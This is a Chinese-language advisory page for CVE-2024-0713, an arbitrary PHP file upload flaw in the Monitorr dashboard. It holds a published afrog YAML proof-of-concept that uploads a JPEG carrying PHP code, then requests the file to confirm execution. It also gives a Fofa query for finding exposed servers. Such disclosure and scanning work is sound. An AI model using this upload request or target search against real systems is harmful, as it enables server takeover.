CVE-2024-0713: Monitorr upload 任意文件上传

日期: 2025-09-01 | 影响软件: Monitorr | POC: 已公开

漏洞描述

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端，该系统存在文件上传漏洞，通过该漏洞可以获取服务器权限。 Fofa: icon_hash="-211006074" || body="assets/php/timestamp.php"

PoC代码[已公开]

id: CVE-2024-0713

info:
  name: Monitorr upload 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端，该系统存在文件上传漏洞，通过该漏洞可以获取服务器权限。
    Fofa: icon_hash="-211006074" || body="assets/php/timestamp.php"
  affected: Monitorr ≤ v1.7.6m
  reference:
    - https://mp.weixin.qq.com/s/3Zmr-6H9Nd7ilgexT5GrlA
  tags: cve,cve2024,monitorr,fileupload
  created: 2024/02/02

set:
  randstr: randomLowercase(6)
  rboundary: randomLowercase(8)
  payload: base64Decode("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=")
rules:
  r0:
    request:
      method: POST
      path: /assets/php/upload.php
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{payload}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'has been uploaded to:')
  r1:
    request:
      method: GET
      path: /assets/data/usrimg/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(b'atfersotg')
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-0713.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-28871: Monitorr 1.7.6m - Unauthenticated Remote Code Execution POC

CVE-2024-0713: Monitorr Services Configuration - Arbitrary File Upload POC

Monitorr /upload.php 路径存在任意文件上传漏洞 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Monitorr /upload.php 路径存在任意文件上传漏洞无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC